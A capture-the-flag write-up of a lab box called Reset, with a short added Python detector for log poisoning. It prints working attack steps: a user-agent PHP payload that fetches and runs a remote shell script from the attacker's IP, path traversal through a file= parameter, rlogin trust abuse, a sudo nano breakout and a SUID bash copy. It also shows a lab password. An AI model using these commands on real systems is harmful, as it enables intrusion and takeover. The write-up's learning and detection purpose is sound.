Reset - Writeup (Vulnlab)

Box Summary
The box had an LFI in a web dashboard that allowed log poisoning, leading to a shell as www-data. From there, I found sadm was a trusted user via rlogin, so I created a local user with the same name and logged in without a password. Inside, I attached to an open tmux session and grabbed sadm's password. Finally, using a sudo nano privilege, I escalated to root with a quick breakout.
INFO
I started with a basic scan and found this:
22/tcp open ssh
80/tcp open http
512/tcp open exec
513/tcp open login
514/tcp open shell
FOOTHOLD
Port 80 was running a web server with a simple Reset button. I tried submitting admin and it worked. Captured the request using CAIDO and saw the password exposed in plain text.

LFI
After logging into the Dashboard, I saw this:

Checking how the data was being loaded, I found this:
file=%2Fvar%2Flog%2Fapache2%2Faccess.log
So I threw in a standard Linux LFI wordlist and got some hits:

Poisoning Logs
From what I saw, the dashboard was reading log files like syslog and auth.log, so I decided to try log poisoning.
Used this:
curl -A "<?php system('curl 10.10.14.61/rev.sh|bash'); ?>" http://10.129.184.161/
Then accessed the log via LFI like this:
file=../../../../../../../var/log/apache2/access.log
And got a shell!
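As an added example (not part of the original writeup), here is a small detector for the two things this section relies on, run over constructed access-log lines: PHP tags landing in a client-controlled header that Apache writes into access.log, and the dashboard's file= parameter pointing outside the web root. The /dashboard.php path and the sample lines are assumptions; the file= parameter name and the poisoning string are the ones shown above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format, as written by the default access.log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)
# dot-dot segments or an absolute path: the include should never see either
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\|^/)')

# Constructed sample lines (not from the box): clean, poisoning, LFI read.
SAMPLE_LOG = [
    '10.10.14.5 - - [16/Jul/2025:03:20:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.61 - - [16/Jul/2025:03:21:10 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"<?php system(\'curl 10.10.14.61/rev.sh|bash\'); ?>"',
    '10.10.14.61 - - [16/Jul/2025:03:21:12 +0000] '
    '"GET /dashboard.php?file=../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 9812 "-" "curl/8.0"',
]


def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def file_param(request):
    """Return the decoded value of the file= query parameter, if present."""
    parts = request.split(' ')
    if len(parts) < 2:
        return None
    vals = parse_qs(urlsplit(parts[1]).query).get('file')
    return vals[0] if vals else None


def analyse(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    rec = parse_line(line)
    if rec is None:
        return ['unparseable line']
    findings = []
    # Log poisoning: PHP code in a header that ends up verbatim in the log.
    for field in ('ua', 'ref', 'req'):
        if PHP_TAG_RE.search(rec[field]):
            findings.append(f'php tag in {field} from {rec["ip"]}')
    # LFI: file= pointing at a traversal or an absolute path such as a log.
    target = file_param(rec['req'])
    if target and TRAVERSAL_RE.search(target):
        findings.append(f'file= traversal to {target} from {rec["ip"]}')
    return findings


def scan(lines):
    """Return (index, findings) for every line that raised a finding."""
    return [(i, analyse(l)) for i, l in enumerate(lines) if analyse(l)]
```

The server-side fix is the mirror image of the second check: resolve file= against a fixed allowlist of log names instead of passing user input to include().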

We can cat the user.txt file as www-data, located at /home/sadm/user.txt.
While exploring, I noticed that sadm was listed as a trusted user. We can see that rlogin is set up through the /etc/hosts.equiv file, and that file is present on the box.

Another interesting thing is that we can see the user sadm has an active tmux session.

SADM USER | RLOGIN
To use rlogin, I saw that sadm was listed as a trusted user in /etc/hosts.equiv. So locally I created a user with the same name:
sudo useradd sadm
sudo passwd sadm
su sadm
rlogin 10.129.184.161
Logged in without password!
TMUX Session
I had already noticed that there was a tmux session running as sadm. For those who don’t know, tmux lets you have multiple terminal windows in one session and stay connected even if you close the shell:
tmux ls
sadm_session: 1 windows (created Wed Jul 16 03:25:31 2025)
tmux a -t sadm_session

And... we got sadm's password!
Password:
7lE2PAfVHfjz4HpE
PrivEsc to ROOT
Logged in as sadm using the found password. Checked for sudo rights:
sadm@reset:~$ sudo -l
Matching Defaults entries for sadm on reset:
env_reset, timestamp_timeout=-1, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User sadm may run the following commands on reset:
(ALL) PASSWD: /usr/bin/nano /etc/firewall.sh
(ALL) PASSWD: /usr/bin/tail /var/log/syslog
(ALL) PASSWD: /usr/bin/tail /var/log/auth.log
The fact that I could run nano as sudo was perfect, just a classic breakout opportunity :D
sudo /usr/bin/nano /etc/firewall.sh
# Inside nano:
Ctrl + R
Ctrl + X
reset; sh 1>&0 2>&0
Alternative method I tried:

cp /bin/bash /tmp/shaka && chmod +xs /tmp/shaka
cd /tmp/
./shaka -p
And got root access:

Pwned!